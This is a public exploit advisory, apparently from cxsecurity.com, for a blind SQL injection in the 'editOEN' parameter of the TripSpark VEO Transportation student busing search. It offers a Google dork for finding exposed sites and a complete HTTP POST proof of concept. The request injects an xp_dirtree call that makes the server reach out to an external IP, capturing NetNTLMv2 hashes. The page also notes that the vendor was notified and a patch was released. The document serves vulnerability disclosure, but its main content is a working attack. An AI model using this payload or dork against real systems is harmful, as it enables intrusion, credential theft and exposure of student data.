TripSpark VEO Transportation SQL Injection

2021.07.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top